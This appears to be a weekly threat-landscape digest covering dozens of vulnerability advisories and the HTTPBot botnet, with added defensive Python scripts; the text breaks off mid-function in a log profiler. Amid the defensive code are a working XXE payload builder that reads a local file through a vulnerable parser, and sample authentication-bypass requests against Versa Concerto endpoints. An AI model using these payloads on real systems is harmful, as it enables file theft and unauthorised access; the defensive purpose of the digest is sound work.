Weekly Threat Landscape Digest – Week 22

This week’s cyber threat landscape reveals a notable surge in zero-day exploit activity, targeted phishing operations, and the exploitation of unpatched vulnerabilities across various industries. Adversaries are demonstrating increased precision and adaptability, emphasizing the critical need for organizations to strengthen patch management processes, improve threat detection capabilities, and ensure continuous security monitoring. Equally essential are ongoing employee awareness programs, timely access to actionable threat intelligence, and a robust, well-practiced incident response plan to enable rapid containment and recovery from emerging threats.
- High-Severity Privilege Escalation in Apple Devices (CVE-2025-31219)
Apple has patched a high-severity vulnerability (CVE-2025-31219) in the XNU kernel, affecting macOS, iOS, iPadOS, watchOS, tvOS, and visionOS. The flaw is a race condition in kernel memory handling: an attacker who can already run low-privileged code on the device can use it to escalate privileges and execute code with kernel-level access. With a CVSS score of 8.8, this issue could lead to full device compromise if left unpatched. Although no active exploitation has been reported, immediate updates are recommended.
Impacted Versions:
- macOS Sequoia < 15.5
- macOS Sonoma < 14.7.6
- macOS Ventura < 13.7.6
- iOS / iPadOS < 18.5
- tvOS < 18.5
- watchOS < 11.5
- visionOS < 2.5
Fixed In:
- macOS Sequoia 15.5
- macOS Sonoma 14.7.6
- macOS Ventura 13.7.6
- iOS / iPadOS 18.5
- tvOS 18.5
- watchOS 11.5
- visionOS 2.5
Action Required:
Update all Apple devices to the latest versions to prevent exploitation.
Reference: https://www.zerodayinitiative.com/advisories/ZDI-25-305/
- Medium-Severity Cross-Site Scripting in Bitwarden (CVE-2025-5138)
A DOM-based Cross-Site Scripting (XSS) vulnerability (CVE-2025-5138) has been discovered in Bitwarden, a widely used open-source password management service. This vulnerability allows attackers to inject and execute arbitrary JavaScript code by uploading a specially crafted PDF file through Bitwarden’s Resources upload feature. The root cause lies in the insufficient validation and sanitization of user-controlled input in the PDF file handler, leading to unintended script execution in the context of the Bitwarden web app.
Successful exploitation could lead to session hijacking, theft of credentials held in the web vault, and unauthorized actions performed under the victim’s account. A publicly available proof-of-concept increases the urgency for users and administrators to take mitigation steps.
Impacted Versions:
Bitwarden versions ≤ 2.25.1
Fixed In:
A patched version beyond 2.25.1 is expected — users are advised to monitor official channels for the release.
Action Required:
- Avoid uploading untrusted PDF files until a fix is applied
- Apply the latest security update once available
- Monitor for any unusual activity in Bitwarden accounts
Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-5138
- Multiple Vulnerabilities Patched in Google Chrome (CVE-2025-5063 to CVE-2025-5283)
Google has released Chrome version 137.0.7151.55/56 for Windows and Mac, 137.0.7151.55 for Linux, and 137.0.7151.51 for iOS, addressing several high- and medium-severity vulnerabilities. These flaws, if exploited, could allow remote code execution, data exposure, memory corruption, or denial-of-service attacks.
Key Vulnerabilities Addressed:
- CVE-2025-5063 (High): Use-after-free in Compositing — may lead to arbitrary code execution
- CVE-2025-5280 (High): Out-of-bounds write in V8 — memory corruption, possible RCE
- CVE-2025-5064 (Medium): Improper implementation in Background Fetch API — data exposure
- CVE-2025-5065 (Medium): Validation issue in FileSystemAccess API — potential data leakage
- CVE-2025-5066 (Medium): Messaging component flaw — could enable spoofing
- CVE-2025-5281 (Medium): BFCache caching issue — security bypass risk
- CVE-2025-5283 (Medium): Use-after-free in libvpx — memory corruption/crash risk
- CVE-2025-5067 (Low): UI spoofing potential in Tab Strip component
Fixed Versions:
- Chrome 137.0.7151.55/56 (Windows, Mac)
- Chrome 137.0.7151.55 (Linux)
- Chrome 137.0.7151.51 (iOS)
Action Required:
Users are strongly advised to update Chrome across all platforms to the latest version to mitigate these security risks.
Reference:
https://chromereleases.googleblog.com/2025/05/stable-channel-update-for-desktop_27.html
- Critical Security Flaw in Mozilla Firefox and Thunderbird (CVE-2025-5262)
Mozilla has released security updates for Firefox and Thunderbird, including their ESR (Extended Support Release) versions, addressing multiple vulnerabilities. The most critical is CVE-2025-5262 — a double-free flaw in the libvpx encoder component used for WebRTC. This issue could result in memory corruption and lead to a crash exploitable for arbitrary code execution.
Key Vulnerability:
- CVE-2025-5262 (Critical):
A double-free vulnerability in vpx_codec_enc_init_multi during failed encoder initialization. Attackers could leverage this for memory corruption and potentially gain control of affected systems.
Other Risks Highlighted in Mozilla Advisories:
- Local code execution vulnerabilities
- Cross-origin data leakage risks
- Clickjacking vectors
Fixed In:
- Firefox 139
- Firefox ESR 115.24 / 128.11
- Thunderbird 139 / 128.11
Action Required:
Immediately update all Firefox and Thunderbird instances to the latest versions to prevent exploitation.
References:
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-42/
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-43/
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-44/
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-45/
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-46/
- Privilege Escalation Vulnerabilities in XenServer and Citrix Hypervisor VM Tools (CVE-2025-27462, CVE-2025-27463, CVE-2025-27464)
Citrix has issued security updates addressing three high-severity vulnerabilities impacting XenServer VM Tools for Windows. These flaws allow local attackers within a guest Windows VM to escalate privileges, posing a serious risk of complete VM compromise. The vulnerabilities do not affect Linux VMs, and no updates are required for the underlying XenServer or Citrix Hypervisor hosts.
Key Vulnerabilities:
- CVE-2025-27462
- CVE-2025-27463
- CVE-2025-27464
Type: Local Privilege Escalation (within Windows guest VMs)
Impact: A malicious user with unprivileged code execution inside the guest VM can elevate privileges and potentially take full control of the virtual machine.
Affected Platforms:
- XenServer VM Tools for Windows versions prior to 9.4.1
- Host Environments: XenServer 8.4, Citrix Hypervisor 8.2 CU1 LTSR
- Guest Impact: Windows-based guest VMs only
- Linux VMs: Not affected
Fixed Version:
- XenServer VM Tools for Windows 9.4.1 or newer
Action Required:
Update all affected Windows guest VMs with the latest XenServer VM Tools (v9.4.1+).
- Critical Security Updates for Tenable Network Monitor (CVE-2025-24916, CVE-2025-24917)
Tenable has released version 6.5.1 of Network Monitor to patch two high-severity local privilege escalation vulnerabilities and address weaknesses in bundled third-party libraries. These flaws could allow unauthorized users or non-administrative actors to gain SYSTEM-level access, posing a serious threat to system integrity and control.
Key Vulnerabilities:
- CVE-2025-24916 – Insecure permissions on sub-directories in non-default Windows installs.
CVSS: 7.0 (High)
Impact: May allow privilege escalation by unauthorized users.
- CVE-2025-24917 – Malicious files staged by non-admin users could be executed with SYSTEM privileges.
CVSS: 7.8 (High)
Impact: Enables full system compromise through local code execution.
Affected Versions:
- All versions prior to Tenable Network Monitor 6.5.1
Fixed Version:
- 6.5.1 or newer
Third-Party Library Updates in 6.5.1:
- OpenSSL → v3.0.16
- expat → v2.7.0
- curl → v8.12.0
- libpcap → v1.10.5
- libxml2 → v2.13.8
These updates mitigate known vulnerabilities impacting system confidentiality, integrity, and availability.
Action Required:
Upgrade all Tenable Network Monitor deployments to version 6.5.1 or later to ensure security.
Reference:
https://www.tenable.com/security/tns-2025-10
- Multiple Vulnerabilities Patched in GitLab CE/EE (May 2025 Release)
Denial of Service via Large Blob Endpoint (CVE-2025-0993)
A high-severity vulnerability allows authenticated users to exhaust server resources through unprotected large blob endpoints, resulting in denial of service. The issue carries a CVSS score of 7.5 and affects performance and availability.
2FA Bypass via SAML Response Manipulation (CVE-2024-12093)
Improper XPath validation in SAML response processing enables attackers to bypass two-factor authentication under specific configurations. This vulnerability is rated medium severity (CVSS 6.8).
Abuse of Discord Webhook Integration (CVE-2024-7803)
The Discord webhook feature can be exploited to cause denial of service by sending excessive or malformed requests. This vulnerability holds a CVSS score of 6.5.
Kubernetes Cluster Token Misuse (CVE-2025-3111)
Improper input validation in Kubernetes cluster token handling allows authenticated users to trigger denial of service conditions. This medium-severity flaw also scores 6.5.
Exposure of Masked CI Variables (CVE-2025-4979)
Certain conditions in the GitLab UI may allow attackers to view masked CI/CD variables, leading to potential leakage of sensitive information. CVSS score is 4.9.
Additional Medium and Low Severity Issues
Other vulnerabilities include bypassing 2FA due to flawed group access controls (CVE-2025-0605, CVSS 4.6), full visibility of email addresses meant to be partially hidden (CVE-2025-0679, CVSS 4.3), branch name confusion in confidential merge requests (CVE-2024-9163, CVSS 3.5), and limited-permission access to job data via GraphQL queries (CVE-2025-1110, CVSS 2.7).
Affected and Fixed Versions
GitLab CE/EE versions before 18.0.1, 17.11.3, and 17.10.7 are affected. Users are strongly advised to upgrade to these patched versions to mitigate the listed vulnerabilities.
Reference:
https://about.gitlab.com/releases/2025/05/21/patch-release-gitlab-18-0-1-released/
- Critical Authentication Bypass Vulnerability in NETGEAR Routers (CVE-2025-4978)
A critical vulnerability (CVE-2025-4978) has been discovered in the NETGEAR DGND3700v2 wireless router. This flaw allows remote unauthenticated attackers to bypass authentication mechanisms through a hidden backdoor present in the embedded HTTP server. The vulnerability has been assigned a CVSS v4 score of 9.3, reflecting its high impact and ease of exploitation.
Impact of Exploitation
Successful exploitation of this vulnerability can grant attackers full administrative access to the affected router. Once compromised, attackers may perform actions such as stealing credentials, hijacking DNS settings, or installing persistent malware on the network. This could lead to complete compromise of the internal network and user privacy.
Affected Product and Version
The vulnerability specifically affects the NETGEAR DGND3700v2 router running firmware version V1.1.00.15_1.00.15NA. No other models are reported to be impacted at this time.
Patched Firmware Version
NETGEAR has released firmware version V1.1.00.26 and later to address this critical flaw. Users of the affected model are urged to upgrade immediately to the latest firmware available on the official NETGEAR website.
Reference
https://nvd.nist.gov/vuln/detail/CVE-2025-4978
- Critical Remote Code Execution Vulnerabilities in Netwrix Password Secure (CVE-2025-26817 & CVE-2025-26818)
Netwrix has disclosed two critical remote code execution vulnerabilities affecting its Password Secure product. Identified as CVE-2025-26817 and CVE-2025-26818, these issues impact all versions up to and including 9.2.1. The vulnerabilities were responsibly reported by security researchers and allow authenticated users to execute arbitrary commands on the underlying system via shared document and SSH application functionalities.
Impact of Exploitation
Both vulnerabilities carry a CISA ADP base score of 9.8, highlighting their critical nature. Successful exploitation may lead to full system compromise. While no public exploit code has been identified yet and no active exploitation has been observed, the public disclosure of these flaws significantly increases the risk of future attacks.
Affected Versions
All versions of Netwrix Password Secure up to and including 9.2.1 are vulnerable. Organizations using this software should consider themselves at risk if not updated.
Patched Version
Netwrix has released version 9.2.2 to address both vulnerabilities. This update eliminates the command injection flaws and should be applied immediately across all affected systems.
Reference
https://community.netwrix.com/t/adv-2025-009-remote-code-execution-vulnerabilities-in-netwrix-password-secure/5034
- Critical Remote Code Execution Vulnerability in Adobe Dreamweaver (CVE-2025-30310)
A critical remote code execution (RCE) vulnerability has been discovered in Adobe Dreamweaver, tracked as CVE-2025-30310. The issue lies in the deprecated V8 JavaScript engine bundled with Dreamweaver. Successful exploitation allows attackers to execute arbitrary code when a user opens a malicious file or visits a crafted web page, potentially leading to full system compromise, limited by the user’s privileges.
Impact of Exploitation
The vulnerability is classified as critical. It requires some user interaction—such as opening a malicious file or browsing to a specially crafted page—to trigger the payload. Once exploited, attackers can execute arbitrary code within the context of the Dreamweaver process, giving them control over the system.
Affected Versions
All Adobe Dreamweaver versions up to 21.4 on both Windows and macOS platforms are affected.
Patched Version
Adobe has addressed the vulnerability in version 21.5 for both Windows and macOS. Users must ensure they are running this version or later to mitigate the risk.
Reference
https://helpx.adobe.com/security/products/dreamweaver/apsb25-35.html
- Critical Remote Code Execution Vulnerability in TI WooCommerce Wishlist Plugin (CVE-2025-47577)
A critical unauthenticated remote code execution (RCE) vulnerability has been identified in the TI WooCommerce Wishlist plugin for WordPress, tracked as CVE-2025-47577. This flaw allows attackers to upload arbitrary files, including malicious PHP scripts, to the server without authentication. The vulnerability affects plugin versions up to and including 2.9.2 and remains unpatched as of this advisory.
Root Cause and Impact
The issue originates in the tinvwl_upload_file_wc_fields_factory function in integrations/wc-fields-factory.php. This function uses WordPress’s wp_handle_upload mechanism but explicitly disables the file type check by passing ‘test_type’ => false. The vulnerable code path is only reachable when the WC Fields Factory plugin is also active; in that configuration an attacker can upload a PHP file, execute arbitrary code, steal sensitive information, and compromise the entire WordPress installation.
Affected Versions
All TI WooCommerce Wishlist plugin versions up to and including 2.9.2.
Mitigation and Recommendations
Administrators are strongly advised to deactivate and remove the plugin immediately from affected systems. Additionally, review the server for unauthorized or suspicious uploads, enable a Web Application Firewall (WAF), restrict PHP execution in upload directories, and deploy file integrity monitoring tools. Until a patch is released, continuous monitoring and additional security layers are essential.
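The review of the uploads area recommended above, as an added example (not WordPress’s or the plugin’s code): it walks a tree in place of wp-content/uploads and reports anything with a server-executable extension anywhere in its name (Apache can execute "x.php.jpg" under some mod_mime setups), any file containing a PHP open tag, and any "image" whose bytes do not start with image magic. The directory layout and file contents are constructed for the demonstration.

```python
"""Audit a WordPress uploads tree for planted PHP files (added example)."""
import os
import tempfile
from pathlib import Path

EXEC_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
PHP_TAGS = (b"<?php", b"<?=")
IMAGE_MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
               ".png": b"\x89PNG", ".gif": b"GIF8"}


def classify(path):
    """Reason the file is suspect, or None if it looks like an ordinary upload."""
    p = Path(path)
    suffixes = [s.lower() for s in p.suffixes]
    # Any executable extension in the name, not only the last one.
    if any(s in EXEC_EXTS for s in suffixes):
        return f"executable extension in name ({''.join(suffixes)})"
    try:
        head = p.read_bytes()[:4096]
    except OSError:
        return None
    if any(tag in head for tag in PHP_TAGS):
        return "PHP open tag inside a non-PHP file"
    magic = IMAGE_MAGIC.get(suffixes[-1]) if suffixes else None
    if magic and not head.startswith(magic):
        return "image extension but no image magic bytes"
    return None


def audit_uploads(root):
    """Walk the tree; return sorted (relative_path, reason) pairs for suspect files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            reason = classify(full)
            if reason:
                hits.append((full.relative_to(root).as_posix(), reason))
    return sorted(hits)


def demo():
    """Build a constructed uploads tree (stand-in for wp-content/uploads) and audit it."""
    with tempfile.TemporaryDirectory() as root:
        month = Path(root) / "2025" / "05"
        month.mkdir(parents=True)
        (month / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 32)    # JPEG magic
        (month / "avatar.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)  # PNG magic
        (month / "banner.gif").write_bytes(b"GIF89a" + b"\x00" * 32)            # GIF magic
        (month / "shell.php").write_bytes(b"<?php echo 'planted'; ?>")          # dropped script
        (month / "cover.jpg.php").write_bytes(b"<?php echo 'double'; ?>")       # double extension
        (month / "logo.png").write_bytes(b"<?php /* disguised */ ?>")           # PHP inside "image"
        return audit_uploads(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Run it against the real uploads directory by calling audit_uploads("/var/www/html/wp-content/uploads"); a hit on a file newer than the plugin install date deserves a full incident review, not just deletion.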
Reference
https://patchstack.com/articles/unpatched-critical-vulnerability-in-ti-woocommerce-wishlist-plugin/
https://nvd.nist.gov/vuln/detail/CVE-2025-47577
- High-Severity Vulnerability in Siemens SiPass Integrated (CVE-2022-31812)
A high-severity vulnerability (CVE-2022-31812) has been identified in the Siemens SiPass Integrated physical access control system. This flaw allows unauthenticated remote attackers to trigger a denial-of-service (DoS) condition, potentially disrupting building entry systems, alarms, or other security mechanisms that rely on SiPass. The issue affects all versions prior to V2.95.3.18.
Root Cause and Impact
The vulnerability stems from improper handling of integrity checks in network packet processing. Specifically, an out-of-bounds read occurs due to the software attempting to read beyond the allocated memory buffer. This flaw does not require any authentication or user interaction, and a successful exploit can crash the application, rendering critical physical access functions inoperable.
Affected Versions
All Siemens SiPass Integrated versions prior to V2.95.3.18.
Mitigation and Recommendations
Siemens has released version V2.95.3.18 to address the issue. Organizations using SiPass are advised to apply the update immediately to avoid potential security disruptions. Until the patch is applied, monitoring network traffic and enforcing strict access control on management interfaces is recommended.
Reference
https://cert-portal.siemens.com/productcert/html/ssa-041082.html
- Critical RCE Vulnerability in Roundcube Webmail (CVE-2025-48745)
A critical post-authentication remote code execution (RCE) vulnerability, tracked as CVE-2025-48745, has been identified in Roundcube Webmail. The flaw affects all versions from v1.1.0 to 1.6.10 and allows any authenticated user to execute arbitrary code on the hosting server. This can lead to complete system takeover.
Risk and Exposure
The vulnerability remained undetected for over a decade and poses a severe risk to over 53 million internet-facing servers. Roundcube is commonly deployed with hosting control panels such as cPanel, Plesk, ISPConfig, and DirectAdmin. The exploit is trivial to execute—requiring only a single click—and no special bypass techniques like WAF evasion are needed. The flaw is similar to previous Roundcube vulnerabilities exploited by threat actors such as APT28 (GRU).
Mitigation Steps
A patched version (v1.6.11) is expected soon. Until then, organizations are advised to:
- Restrict access to Roundcube instances using IP whitelisting or VPN.
- Monitor server logs for suspicious activity from low-privilege accounts.
- Temporarily disable Roundcube access if not immediately needed.
Affected Versions
Roundcube Webmail versions from v1.1.0 through v1.6.10.
Reference
https://www.csc.gov.ae/
- High-Severity Vulnerability in Johnson Controls ICU Tool (CVE-2025-26383)
A high-severity vulnerability has been identified in the Johnson Controls iSTAR Configuration Utility (ICU) tool, tracked as CVE-2025-26383. The flaw affects all versions of the ICU tool prior to 6.9.5 and results from a memory leak caused by an uninitialized variable.
Risk and Exposure
An attacker with network access to the Windows machine running the ICU tool can exploit this vulnerability to access sensitive information from the host system’s memory. This issue is limited to the ICU tool and does not affect the iSTAR controllers themselves, including legacy, Ultra, and G2 series devices.
Mitigation Steps
Organizations are strongly advised to:
- Update the ICU tool to version 6.9.5 or later.
- Limit network access to systems running ICU tools.
- Monitor memory and application behavior for signs of exploitation.
Affected Versions
All versions of the Johnson Controls ICU tool prior to 6.9.5.
Reference
https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories
- Critical Signature Spoofing Flaw in OpenPGP.js (CVE-2025-47934)
A critical vulnerability, tracked as CVE-2025-47934, has been identified in OpenPGP.js—a widely used open-source JavaScript library for enabling end-to-end encryption in web applications. The flaw enables attackers to spoof digital signatures on inline-signed and signed+encrypted messages, compromising message integrity and trust.
Technical Details
- Impact Type: Signature Spoofing / Message Integrity Bypass
- Affected Functions:
- openpgp.verify() (for inline-signed messages)
- openpgp.decrypt() with verificationKeys (for signed+encrypted messages)
- Vulnerable Versions:
- v5.0.1 to v5.11.2
- v6.0.0-alpha.0 to v6.1.0
- (v4 is not affected)
- Patched Versions:
- v5.11.3 and v6.1.1
Workarounds
- For inline-signed messages: Manually extract message and signatures, and use detached verification via openpgp.verify.
- For signed+encrypted messages: First decrypt without verificationKeys, then separately verify the signature using openpgp.verify.
Mitigation Steps
- Update OpenPGP.js to v5.11.3 or v6.1.1 immediately.
- Audit applications using the library to ensure no downstream impact from signature spoofing.
Reference
https://github.com/openpgpjs/openpgpjs/security/advisories/GHSA-8qff-qr5q-5pr8
- Critical Vulnerabilities in Versa Concerto (CVE-2025-34025, CVE-2025-34026, CVE-2025-34027)
Three critical vulnerabilities have been discovered in Versa Networks’ Concerto orchestration platform. These flaws allow remote attackers to bypass authentication, escape Docker containers, and execute arbitrary code on the host system. If exploited, attackers could gain full control over affected infrastructure.
Technical Details
- CVE-2025-34026 – Authentication Bypass via Traefik Misconfiguration
- CVSS Score: 9.2 (Critical)
- Impact: Unauthorized access to internal Spring Boot Actuator endpoints such as /actuator/heapdump, potentially leaking sensitive memory and operational data.
- Chaining: Can be linked with CVE-2024-45410 for extended exploitation.
- CVE-2025-34027 – RCE via Arbitrary File Write
- CVSS Score: 10.0 (Critical)
- Impact: Exploits a race condition in the /portalapi/v1/package/spack/upload endpoint to upload malicious files and modify /etc/ld.so.preload, enabling arbitrary code execution through LD_PRELOAD.
- Outcome: Reverse shell access on the host.
- CVE-2025-34025 – Docker Container Escape
- CVSS Score: 8.6 (High)
- Impact: Due to unsafe default mounting of host paths inside Docker, attackers can escalate from container access to full host-level code execution.
Mitigation & Recommendations
- Upgrade: Apply the patch by updating to Concerto version 12.2.1 GA or later.
- If patching is not possible, implement the following mitigations:
- Block semicolons (;) in URL paths.
- Drop HTTP requests with Connection: X-Real-Ip.
- Restrict access to the Traefik reverse proxy and admin endpoints.
- Monitor logs and traffic targeting sensitive endpoints like /portalapi/v1/package/spack/upload and /actuator/heapdump.
- Apply custom WAF rules to block abnormal traffic patterns.
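The interim rules above, implemented as an added example (not Versa’s code): one request at a time, block any URL path containing ";" (checked after percent-decoding so "%3B" cannot slip through), block any request whose Connection header names X-Real-Ip (a proxy following RFC 7230 strips the headers listed in Connection as hop-by-hop before forwarding, which is why a client would list it there), and raise an alert on access to the sensitive endpoints named in the advisory. Requests are modelled as (method, path, headers); the sample traffic at the bottom is constructed.

```python
"""Interim request screening for the Versa Concerto mitigations (added example)."""
from dataclasses import dataclass, field
from urllib.parse import unquote

SENSITIVE_PATHS = ("/actuator/", "/portalapi/v1/package/spack/upload")


@dataclass
class Verdict:
    action: str                      # "allow", "alert" or "block"
    reasons: list = field(default_factory=list)


def connection_tokens(headers):
    """Header names listed in Connection, lower-cased (names are case-insensitive)."""
    raw = headers.get("connection", "")
    return {tok.strip().lower() for tok in raw.split(",") if tok.strip()}


def screen_request(method, path, headers):
    """Return a Verdict for a single request. Header keys may use any case."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    decoded = unquote(path)          # one decode pass: "%3B" -> ";"
    reasons = []
    if ";" in decoded:
        reasons.append("semicolon in URL path")
    if "x-real-ip" in connection_tokens(hdrs):
        reasons.append("Connection header names X-Real-Ip")
    if reasons:
        return Verdict("block", reasons)
    if any(marker in decoded for marker in SENSITIVE_PATHS):
        return Verdict("alert", [f"{method} to sensitive endpoint {decoded}"])
    return Verdict("allow")


def screen_batch(requests):
    """Screen many requests; returns {action: count} for a quick log summary."""
    summary = {"allow": 0, "alert": 0, "block": 0}
    for method, path, headers in requests:
        summary[screen_request(method, path, headers).action] += 1
    return summary


# Constructed sample traffic, not captured from a real system.
SAMPLE_REQUESTS = [
    ("GET", "/portalapi/v1/status;jsessionid=abc", {"Host": "concerto.example"}),
    ("GET", "/actuator/heapdump", {"Connection": "keep-alive, X-Real-Ip"}),
    ("GET", "/%3B/actuator/heapdump", {"Host": "concerto.example"}),
    ("POST", "/portalapi/v1/package/spack/upload", {"Content-Type": "multipart/form-data"}),
    ("GET", "/login", {"Connection": "keep-alive"}),
]

if __name__ == "__main__":
    for method, path, headers in SAMPLE_REQUESTS:
        v = screen_request(method, path, headers)
        print(f"{v.action:5} {method} {path} {'; '.join(v.reasons)}")
    print(screen_batch(SAMPLE_REQUESTS))   # {'allow': 1, 'alert': 1, 'block': 3}
```

The semicolon rule is deliberately blunt: it also rejects legitimate matrix parameters such as ;jsessionid=, so treat it as a stop-gap until 12.2.1 GA is in place. The "alert" verdicts are the feed for the monitoring bullet above; an alert on /actuator/heapdump from anything other than an operator address is worth an immediate look.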
References
- https://nvd.nist.gov/vuln/detail/CVE-2025-34026
- https://nvd.nist.gov/vuln/detail/CVE-2025-34027
- https://nvd.nist.gov/vuln/detail/CVE-2025-34025
- Critical Vulnerabilities in Canon Office & Laser Printers (CVE-2024-12647, CVE-2024-12648, CVE-2024-12649, CVE-2025-2146)
Multiple critical buffer overflow vulnerabilities have been disclosed in Canon’s Office/Small Office Multifunction and Laser Printers. Tracked as CVE-2024-12647, CVE-2024-12648, CVE-2024-12649, and CVE-2025-2146, these flaws allow remote attackers to execute arbitrary code or trigger denial-of-service (DoS) conditions on affected devices. The vulnerabilities carry a CVSS v3 base score of 9.8, reflecting critical severity.
Technical Details
- CVE IDs: CVE-2024-12647, CVE-2024-12648, CVE-2024-12649, CVE-2025-2146
- Vulnerability Class: Out-of-Bounds Write (CWE-787)
- CVSS v3 Base Score: 9.8 (Critical)
- Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Impact:
- Remote Code Execution (RCE)
- Denial-of-Service (DoS)
- Attack Vector: Remote network access
- Prerequisites: No authentication or user interaction required
- Vulnerable Systems: Devices connected directly to the Internet without firewall protection are especially exposed.
Affected Canon Printer Models
- imageCLASS MF Series:
- MF455DW, MF453DW, MF452DW, MF451DW
- MF656CDW, MF654CDW, MF653CDW, MF652CW
- MF1238 II, MF1643iF II, MF1643i II
- imageCLASS LBP Series:
- LBP237DW, LBP236DW
- LBP632CDW, LBP633CDW
- LBP1238 II
Canon has noted that further models may be affected and will update the list accordingly.
Mitigation & Recommendations
- Update all affected Canon printers to the latest firmware provided by Canon.
- Do not expose Canon printers directly to the Internet.
- Segment printers on internal networks with access restrictions.
- Monitor logs for suspicious access attempts on printer network ports.
References
- Critical XXE Vulnerability in WSO2 API Manager (CVE-2025-2905)
Overview
A critical XML External Entity (XXE) vulnerability has been disclosed in the Gateway component of WSO2 API Manager versions ≤ 2.0.0. The flaw allows unauthenticated remote attackers to read files from the server or trigger Denial-of-Service (DoS) via specially crafted URL paths.
Key Details
- CVE: CVE-2025-2905
- Component: WSO2 API Manager Gateway
- Impact:
- File read (info disclosure)
- DoS (service crash)
- Affected Versions: ≤ 2.0.0 (unpatched)
- Root Cause: Improper XML entity resolution handling
- Exploit Condition: Malicious XML via crafted URL
- Patch: Apply WSO2-2016-0151 immediately if not already done.
Mitigation
- Update WSO2 API Manager to latest version.
- Apply historical patch WSO2-2016-0151 if not yet deployed.
- Restrict external XML entity resolution at the gateway level.
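The two behaviours this advisory contrasts, shown side by side as an added example (not WSO2 code) using Python’s xml.sax: a parser that honours external general entities reads a local file named in a crafted document and returns its contents as element text, while the hardened variant refuses any document carrying a DOCTYPE (which also removes inline entity expansion, the DoS vector) and keeps external entity resolution off. The secret file and the payload are constructed in a temporary directory.

```python
"""XXE: vulnerable versus hardened XML handling (added example)."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data from every element into one string."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts)


def _parse(xml_bytes, resolve_external):
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text.strip()


def parse_vulnerable(xml_bytes):
    """Unsafe: external general entities are fetched and expanded."""
    return _parse(xml_bytes, resolve_external=True)


def parse_hardened(xml_bytes):
    """Safe: no DOCTYPE accepted at all, and external entities stay disabled."""
    if b"<!DOCTYPE" in xml_bytes.upper():
        raise ValueError("DOCTYPE declarations are not accepted")
    return _parse(xml_bytes, resolve_external=False)


def build_payload(target_path):
    """Constructed XXE document whose entity points at a file on the server."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "{target_path}">]>\n'
        "<r>&xxe;</r>"
    ).encode()


def demo():
    """Returns (what the vulnerable parser leaked, whether the hardened one refused)."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")
        with open(secret, "w") as f:
            f.write("db-password-1234")          # constructed secret
        payload = build_payload(secret)
        leaked = parse_vulnerable(payload)
        try:
            parse_hardened(payload)
            refused = False
        except ValueError:
            refused = True
    return leaked, refused


if __name__ == "__main__":
    print(demo())                                # ('db-password-1234', True)
```

Rejecting DOCTYPE outright is the simplest gateway-level control because it closes both the file-read and the entity-expansion DoS paths in one check; if a legitimate client must send a DTD, the fallback is to keep external entities off and cap entity expansion, never to re-enable resolution.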
Reference:
- HTTPBot Botnet Expanding – High Risk for Windows
A new Go-based botnet, HTTPBot, has been growing rapidly since August 2024 and surged in April 2025. It targets gaming platforms, tech firms, and universities, mainly in Asia, with HTTP-layer DDoS attacks that mimic real users.
It supports seven DDoS methods, including:
- HttpAttack: Dynamic TCP/TLS, randomized headers, retry logic
- BrowserAttack: Hides browser window, imitates user actions
- HttpAutoAttack: Parses Set-Cookie to simulate sessions
- HttpFpDlAttack: Forces full data transfer using HTTP/2
- WebSocketAttack: Uses ws/wss, sends messages like human behavior
- PostAttack: Uses POST method, shuffles headers
- CookieAttack: Automates cookie handling during browser-based attack
Evasion Techniques:
- Randomized user agents, headers, cookies, and URL paths
- Retry delay on HTTP 429/405 responses
- Avoids detection by mimicking browser activity and dynamic patterns
- Uses attack ID to control each campaign precisely
Persistence:
- Registers itself at Windows startup via registry
- Sends “ok” to C2 and waits for attack commands
Risk:
- Shifts from traditional DDoS to low-traffic, high-impact targeted business-layer attacks
- Difficult to detect using rule-based anti-DDoS systems
Defenses:
- Use CAPTCHA, dynamic session validation
- Behavior-based detection preferred over static rules
- Monitor registry for unusual startup entries
- Protect login/payment APIs with rate limits and session integrity checks
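The behaviour-based detection recommended above, as an added example (not taken from the HTTPBot report): a filter keyed on a User-Agent string or a URL fails against a bot that randomises both, so this scores each client IP on behaviour instead: request rate, the number of distinct User-Agent strings it presents, how many of its requests hit a never-repeated path, and whether it keeps sending through 429 responses. The log lines are constructed in Combined Log Format with RFC 5737 addresses; the thresholds are illustrative and need tuning per site.

```python
"""Behaviour-based flagging of HTTPBot-style clients in web server logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one Combined Log Format line; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def profile_clients(lines):
    """Aggregate per-IP counters: requests, user agents, paths, 429s, time span."""
    def fresh():
        return {"n": 0, "uas": set(), "paths": [], "n429": 0, "first": None, "last": None}
    per_ip = defaultdict(fresh)
    for line in lines:
        rec = parse_line(line)
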